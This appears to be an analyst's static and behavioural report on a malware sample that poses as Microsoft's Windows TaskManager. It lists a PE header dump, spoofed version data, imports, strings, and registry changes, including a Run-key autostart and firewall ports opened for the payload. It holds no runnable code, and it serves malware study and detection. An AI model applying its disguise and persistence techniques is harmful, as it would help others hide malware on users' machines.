- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
- 0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
- Bin:
- //Pic:
- // faking windoz app:
- UninitializedDataSize....: 0
- InitializedDataSize......: 23040
- ImageVersion.............: 0.0
- ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
- FileVersionNumber........: 5.0.2137.1
- LanguageCode.............: English (U.S.)
- FileFlagsMask............: 0x003f
- FileDescription..........: Windows TaskManager
- CharacterSet.............: Unicode
- LinkerVersion............: 2.5
- FileOS...................: Windows NT 32-bit
- MIMEType.................: application/octet-stream
- Subsystem................: Windows GUI
- FileVersion..............: 5.00.2137.1
- TimeStamp................: 2012:10:17 04:29:46+01:00
- FileType.................: Win32 EXE
- PEType...................: PE32
- InternalName.............: taskmgr
- ProductVersion...........: 5.00.2137.1
- SubsystemVersion.........: 4.0
- OSVersion................: 4.0
- OriginalFilename.........: taskmgr.exe
- LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
- MachineType..............: Intel 386 or later, and compatibles
- CompanyName..............: Microsoft Corporation
- CodeSize.................: 108032
- FileSubtype..............: 0
- ProductVersionNumber.....: 5.0.2137.1
- EntryPoint...............: 0x1ef0
- ObjectFileType...........: Executable application
- //Sigcheck
- publisher................: Microsoft Corporation
- product..................: Microsoft(R) Windows (R) 2000 Operating System
- internal name............: taskmgr
- copyright................: Copyright (C) Microsoft Corp. 1991-1999
- original name............: taskmgr.exe
- file version.............: 5.00.2137.1
- description..............: Windows TaskManager
- .text 4096 107728 108032 7.49 7bb7c23fbff31a0f4dc8c2082f47d453
- .data 114688 13048 12800 1.62 bfd92f96b4b275e9bdc8941a0ac85831
- .rsrc 131072 8368 8704 3.36 210a8ec34d58b64a2531c59aa8344586
- .reloc 143360 516 1024 3.94 1841b4a61bd8a2498e642d7a36c6d596
- Compiled by: Borland Delphi 3.0
- Compile Time: 2012-10-17 12:29:46
- Packed entropy: Entropy 7.48782313568
- Name: .text
- Misc: 0x1A4D0
- Misc_PhysicalAddress: 0x1A4D0
- Misc_VirtualSize: 0x1A4D0
- VirtualAddress: 0x1000
- SizeOfRawData: 0x1A600
- PointerToRawData: 0x400
- PointerToRelocations: 0x0
- PointerToLinenumbers: 0x0
- NumberOfRelocations: 0x0
- NumberOfLinenumbers: 0x0
- Characteristics: 0x60000020
- LangID: 040904B0
- LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
- InternalName: taskmgr
- FileVersion: 5.00.2137.1
- CompanyName: Microsoft Corporation
- ProductName: Microsoft(R) Windows (R) 2000 Operating System
- ProductVersion: 5.00.2137.1
- FileDescription: Windows TaskManager
- OriginalFilename: taskmgr.exe
- ------------------
- imported calls DLL
- -------------------
- 0041EA0C GetCPInfo KERNEL32
- 0041EA10 VirtualAlloc KERNEL32
- 0041EA14 LoadLibraryA KERNEL32
- 0041EA18 GetProcAddress KERNEL32
- 0041EA1C GetWindowsDirectoryW KERNEL32
- 0041EA20 lstrcatW KERNEL32
- 0041EA24 CreateFileW KERNEL32
- 0041EA2C LoadIconA USER32
- 0041EA30 CreateIconIndirect USER32
- 0041EA34 GetDlgCtrlID USER32
- 0041EA38 GetScrollPos USER32
- 0041EA3C RegisterDeviceNotificationA USER32
- 0041EA40 DdeEnableCallback USER32
- 0041EA44 DrawStateA USER32
- 0041EA48 MessageBoxIndirectW USER32
- 0041EA4C LoadMenuA USER32
- 0041EA50 GetTabbedTextExtentA USER32
- 0041EA54 UnpackDDElParam USER32
- 0041EA58 DialogBoxIndirectParamW USER32
- 0041EA5C ToAsciiEx USER32
- 0041EA60 IsWindow USER32
- 0041EA64 LoadKeyboardLayoutA USER32
- 0041EA68 GetCursor USER32
- 0041EA6C UserHandleGrantAccess USER32
- 0041EA70 GetMenuState USER32
- 0041EA74 SetMenuItemInfoA USER32
- 0041EA78 TabbedTextOutW USER32
- 0041EA7C mouse_event USER32
- 0041EA80 DdeSetUserHandle USER32
- 0041EA84 SetWindowWord USER32
- 0041EA88 SetDlgItemTextW USER32
- 0041EA8C IsMenu USER32
- 0041EA90 SetWindowTextW USER32
- 0041EA94 GetSystemMenu USER32
- 0041EA98 RegisterClassA USER32
- 0041EA9C ChangeDisplaySettingsExW USER32
- 0041EAA0 SetMenuInfo USER32
- 0041EAA4 GetKeyState USER32
- 0041EAA8 ChildWindowFromPoint USER32
- 0041EAAC LoadCursorFromFileW USER32
- 0041EAB0 SendMessageCallbackA USER32
- 0041EAB4 DdeKeepStringHandle USER32
- 0041EAB8 FlashWindow USER32
- 0041EABC OpenIcon USER32
- 0041EAC0 CreateMenu USER32
- 0041EAC4 FindWindowW USER32
- 0041EAC8 GetIconInfo USER32
- 0041EACC GetWindowInfo USER32
- 0041EAD0 IsCharAlphaNumericA USER32
- 0041EAD4 FrameRect USER32
- 0041EAD8 FlashWindowEx USER32
- 0041EADC SetSysColors USER32
- 0041EAE0 GetCapture USER32
- 0041EAE4 DdeGetLastError USER32
- 0041EAE8 SetWindowsHookA USER32
- 0041EAEC PostThreadMessageA USER32
- 0041EAF0 TranslateMessage USER32
- 0041EAF4 GetDlgItemTextA USER32
- 0041EAF8 GetShellWindow USER32
- 0041EAFC CreateAcceleratorTableW USER32
- 0041EB00 DrawMenuBar USER32
- 0041EB04 DdeDisconnect USER32
- 0041EB08 SetClipboardData USER32
- 0041EB0C CreateDialogParamW USER32
- 0041EB10 ToUnicodeEx USER32
- 0041EB14 CreatePopupMenu USER32
- 0041EB18 IMPQueryIMEA USER32
- 0041EB1C CloseWindowStation USER32
- 0041EB20 GetGuiResources USER32
- 0041EB24 GetPropW USER32
- 0041EB28 SetActiveWindow USER32
- 0041EB2C CharNextExA USER32
- 0041EB30 IsRectEmpty USER32
- 0041EB34 LockSetForegroundWindow USER32
- 0041EB38 SetScrollRange USER32
- 0041EB3C EnumPropsExW USER32
- 0041EB40 PostMessageA USER32
- 0041EB44 GetClassInfoExW USER32
- 0041EB48 UpdateWindow USER32
- 0041EB4C GetFocus USER32
- 0041EB50 GetWindow USER32
- 0041EB54 PaintDesktop USER32
- 0041EB58 GetKeyboardLayout USER32
- 0041EB5C ChangeMenuA USER32
- 0041EB60 GetThreadDesktop USER32
- 0041EB64 CharLowerBuffW USER32
- 0041EB6C RegOpenKeyExW ADVAPI32
- --------------
- stringzzz
- --------------
- .text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
- .data:0041C02C 0000000C C CreateFileW
- .data:0041C038 00000009 C kernel32
- .data:0041EB76 0000000A C GetCPInfo
- .data:0041EB82 0000000D C VirtualAlloc
- .data:0041EB92 0000000D C LoadLibraryA
- .data:0041EBA2 0000000F C GetProcAddress
- .data:0041EBB4 00000015 C GetWindowsDirectoryW
- .data:0041EBCC 00000009 C lstrcatW
- .data:0041EBD8 0000000C C CreateFileW
- .data:0041EBE4 0000000D C KERNEL32.dll
- .data:0041EBF4 0000000A C LoadIconA
- .data:0041EC00 00000013 C CreateIconIndirect
- .data:0041EC16 0000000D C GetDlgCtrlID
- .data:0041EC26 0000000D C GetScrollPos
- .data:0041EC36 0000001C C RegisterDeviceNotificationA
- .data:0041EC54 00000012 C DdeEnableCallback
- .data:0041EC68 0000000B C DrawStateA
- .data:0041EC76 00000014 C MessageBoxIndirectW
- .data:0041EC8C 0000000A C LoadMenuA
- .data:0041EC98 00000015 C GetTabbedTextExtentA
- .data:0041ECB0 00000010 C UnpackDDElParam
- .data:0041ECC2 00000018 C DialogBoxIndirectParamW
- .data:0041ECDC 0000000A C ToAsciiEx
- .data:0041ECE8 00000009 C IsWindow
- .data:0041ECF4 00000014 C LoadKeyboardLayoutA
- .data:0041ED0A 0000000A C GetCursor
- .data:0041ED16 00000016 C UserHandleGrantAccess
- .data:0041ED2E 0000000D C GetMenuState
- .data:0041ED3E 00000011 C SetMenuItemInfoA
- .data:0041ED52 0000000F C TabbedTextOutW
- .data:0041ED64 0000000C C mouse_event
- .data:0041ED72 00000011 C DdeSetUserHandle
- .data:0041ED86 0000000E C SetWindowWord
- .data:0041ED96 00000010 C SetDlgItemTextW
- .data:0041EDA8 00000007 C IsMenu
- .data:0041EDB2 0000000F C SetWindowTextW
- .data:0041EDC4 0000000E C GetSystemMenu
- .data:0041EDD4 0000000F C RegisterClassA
- .data:0041EDE6 00000019 C ChangeDisplaySettingsExW
- .data:0041EE02 0000000C C SetMenuInfo
- .data:0041EE10 0000000C C GetKeyState
- .data:0041EE1E 00000015 C ChildWindowFromPoint
- .data:0041EE36 00000014 C LoadCursorFromFileW
- .data:0041EE4C 00000015 C SendMessageCallbackA
- .data:0041EE64 00000014 C DdeKeepStringHandle
- .data:0041EE7A 0000000C C FlashWindow
- .data:0041EE88 00000009 C OpenIcon
- .data:0041EE94 0000000B C CreateMenu
- .data:0041EEA2 0000000C C FindWindowW
- .data:0041EEB0 0000000C C GetIconInfo
- .data:0041EEBE 0000000E C GetWindowInfo
- .data:0041EECE 00000014 C IsCharAlphaNumericA
- .data:0041EEE4 0000000A C FrameRect
- .data:0041EEF0 0000000E C FlashWindowEx
- .data:0041EF00 0000000D C SetSysColors
- .data:0041EF10 0000000B C GetCapture
- .data:0041EF1E 00000010 C DdeGetLastError
- .data:0041EF30 00000010 C SetWindowsHookA
- .data:0041EF42 00000013 C PostThreadMessageA
- .data:0041EF58 00000011 C TranslateMessage
- .data:0041EF6C 00000010 C GetDlgItemTextA
- .data:0041EF7E 0000000F C GetShellWindow
- .data:0041EF90 00000018 C CreateAcceleratorTableW
- .data:0041EFAA 0000000C C DrawMenuBar
- .data:0041EFB8 0000000E C DdeDisconnect
- .data:0041EFC8 00000011 C SetClipboardData
- .data:0041EFDC 00000013 C CreateDialogParamW
- .data:0041EFF2 0000000C C ToUnicodeEx
- .data:0041F000 00000010 C CreatePopupMenu
- .data:0041F012 0000000D C IMPQueryIMEA
- .data:0041F022 00000013 C CloseWindowStation
- .data:0041F038 00000010 C GetGuiResources
- .data:0041F04A 00000009 C GetPropW
- .data:0041F056 00000010 C SetActiveWindow
- .data:0041F068 0000000C C CharNextExA
- .data:0041F076 0000000C C IsRectEmpty
- .data:0041F084 00000018 C LockSetForegroundWindow
- .data:0041F09E 0000000F C SetScrollRange
- .data:0041F0B0 0000000D C EnumPropsExW
- .data:0041F0C0 0000000D C PostMessageA
- .data:0041F0D0 00000010 C GetClassInfoExW
- .data:0041F0E2 0000000D C UpdateWindow
- .data:0041F0F2 00000009 C GetFocus
- .data:0041F0FE 0000000A C GetWindow
- .data:0041F10A 0000000D C PaintDesktop
- .data:0041F11A 00000012 C GetKeyboardLayout
- .data:0041F12E 0000000C C ChangeMenuA
- .data:0041F13C 00000011 C GetThreadDesktop
- .data:0041F150 0000000F C CharLowerBuffW
- .data:0041F160 0000000B C USER32.dll
- .data:0041F16E 0000000E C RegOpenKeyExW
- .data:0041F17C 0000000D C ADVAPI32.dll
- .rsrc:00420004 00000005 C *&~P
- .rsrc:0042002C 00000005 C *&~P
- .rsrc:004200BC 00000005 C *&~P
- .rsrc:004200E4 00000005 C *&~P
- .rsrc:0042010C 00000005 C *&~P
- .rsrc:00420134 00000005 C *&~P
- .rsrc:0042015C 00000005 C *&~P
- .rsrc:00420184 00000005 C *&~P
- .rsrc:004201AC 00000005 C *&~P
- .rsrc:004201D4 00000005 C *&~P
- .rsrc:004201FC 00000005 C *&~P
- .rsrc:00420224 00000005 C *&~P
- .rsrc:0042024C 00000005 C *&~P
- .rsrc:00420274 00000005 C *&~P
- .rsrc:0042029C 00000005 C *&~P
- .rsrc:004202C4 00000005 C *&~P
- .rsrc:004202EC 00000005 C *&~P
- .rsrc:00420314 00000005 C *&~P
- .rsrc:0042033C 00000005 C *&~P
- .rsrc:004203BC 00000005 C *&~P
- .rsrc:004203E4 00000005 C *&~P
- .rsrc:0042040C 00000005 C *&~P
- .rsrc:00420434 00000005 C *&~P
- .rsrc:0042045C 00000005 C *&~P
- .rsrc:00420484 00000005 C *&~P
- .rsrc:004204AC 00000005 C *&~P
- .rsrc:004204D4 00000005 C *&~P
- .rsrc:004204FC 00000005 C *&~P
- .rsrc:00420524 00000005 C *&~P
- .rsrc:0042054C 00000005 C *&~P
- .rsrc:00420574 00000005 C *&~P
- .rsrc:0042059C 00000005 C *&~P
- .rsrc:004205C4 00000005 C *&~P
- .rsrc:004205EC 00000005 C *&~P
- .rsrc:00420604 00000005 C *&~P
- .rsrc:004207D9 0000000D C wwwwwwwwwwwwx
- .rsrc:004207E9 0000000D C wwwwwwwwwwwwx
- .rsrc:004207F9 0000000D C w\"wwwwwwwxwwx
- .rsrc:0042080B 00000006 C wwwwp
- .rsrc:00420819 00000007 C wwwwwwx
- .rsrc:00420829 0000000D C wwwwwwwwwwwwx
- .rsrc:0042087B 0000000A C wwwwwwwwwx
- .rsrc:0042096B 0000000A C wwwwwwwwwx
- .rsrc:0042098A 0000000A C \bwwwwwwwww
- .rsrc:0042099C 00000009 C wwpwwwwww
- .rsrc:00420AD1 0000000E C wwwwwwwwwwwwww
- .rsrc:00420C11 0000000E C wwwwwwwwwwwwww
- .rsrc:00420C21 0000000B C DDDDDDDDD@
- .rsrc:00420C31 0000000E C DDDDDDDDDGpw\ap
- .rsrc:00420C41 0000000E C DDDDDDDDDGpw\ap
- .rsrc:00420C51 0000000E C DDDDDDDDDDDDDD
- .rsrc:00420C61 0000000E C wwwwwwwwwwwwww
- .rsrc:00420DE9 00000006 C DDDDDD
- .rsrc:00420DF1 00000006 C wwwwww
- .rsrc:00420ECA 00000006 C /
- .rsrc:00420ED2 00000006 C \"\"\"\"/
- .rsrc:00420EDA 00000006 C /
- .rsrc:00420EE2 00000006 C \"\"\"\"/
- .rsrc:00420EEA 00000006 C /
- .rsrc:00420EF2 00000006 C \"\"\"\"/
- .rsrc:00420EFA 00000006 C /
- .rsrc:00420F02 00000006 C \"\"\"\"/
- .rsrc:00420F0A 00000006 C /
- .rsrc:00420F12 00000006 C \"\"\"\"/
- .rsrc:00420F1A 00000006 C /
- .rsrc:00420FFA 00000006 C \"\"\"\"/
- .rsrc:00421002 00000006 C /
- .rsrc:0042100A 00000006 C \"\"\"\"/
- .rsrc:00421012 00000006 C /
- .rsrc:0042101A 00000006 C \"\"\"\"/
- .rsrc:00421022 00000006 C /
- .rsrc:0042102A 00000006 C \"\"\"\"/
- .rsrc:00421032 00000006 C /
- .rsrc:0042103A 00000006 C \"\"\"\"/
- .rsrc:00421042 00000006 C /
- .rsrc:0042112A 00000006 C /
- .rsrc:00421132 00000006 C \"\"\"\"/
- .rsrc:0042113A 00000006 C /
- .rsrc:00421142 00000006 C \"\"\"\"/
- .rsrc:0042114A 00000006 C /
- .rsrc:00421152 00000006 C \"\"\"\"/
- .rsrc:0042115A 00000006 C /
- .rsrc:00421162 00000006 C \"\"\"\"/
- .rsrc:0042116A 00000006 C /
- .rsrc:0042125A 00000006 C \"\"\"\"/
- .rsrc:00421262 00000006 C /
- .rsrc:0042126A 00000006 C \"\"\"\"/
- .rsrc:00421272 00000006 C /
- .rsrc:0042127A 00000006 C \"\"\"\"/
- .rsrc:00421282 00000006 C /
- .rsrc:0042128A 00000006 C \"\"\"\"/
- .rsrc:00421292 00000006 C /
- .rsrc:0042138A 00000006 C /
- .rsrc:00421392 00000006 C \"\"\"\"/
- .rsrc:0042139A 00000006 C /
- .rsrc:004213A2 00000006 C \"\"\"\"/
- .rsrc:004213AA 00000006 C /
- .rsrc:004213B2 00000006 C \"\"\"\"/
- .rsrc:004213BA 00000006 C /
- .rsrc:004214BA 00000006 C \"\"\"\"/
- .rsrc:004214C2 00000006 C /
- .rsrc:004214CA 00000006 C \"\"\"\"/
- .rsrc:004214D2 00000006 C /
- .rsrc:004214DA 00000006 C \"\"\"\"/
- .rsrc:004214E2 00000006 C /
- .rsrc:004215EA 00000006 C /
- .rsrc:004215F2 00000006 C \"\"\"\"/
- .rsrc:004215FA 00000006 C /
- .rsrc:00421602 00000006 C \"\"\"\"/
- .rsrc:0042160A 00000006 C /
- .rsrc:0042171A 00000006 C \"\"\"\"/
- .rsrc:00421722 00000006 C /
- .rsrc:0042172A 00000006 C \"\"\"\"/
- .rsrc:00421732 00000006 C /
- .rsrc:0042184A 00000006 C /
- .rsrc:00421852 00000006 C \"\"\"\"/
- .rsrc:0042185A 00000006 C /
- .rsrc:0042197A 00000006 C \"\"\"\"/
- .rsrc:00421982 00000006 C /
- .rsrc:00421AAA 00000006 C /
- =====================
- behavior check:
- =====================
- Self deleted,
- drops: 1154656.exe payload (self copied), and using CMD command to self exec
- see pic. https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
- REGISTRY:
- ----------------------------------
- Keys added:26
- ----------------------------------
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
- ----------------------------------
- Values added:112
- ----------------------------------
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
- HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
- HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
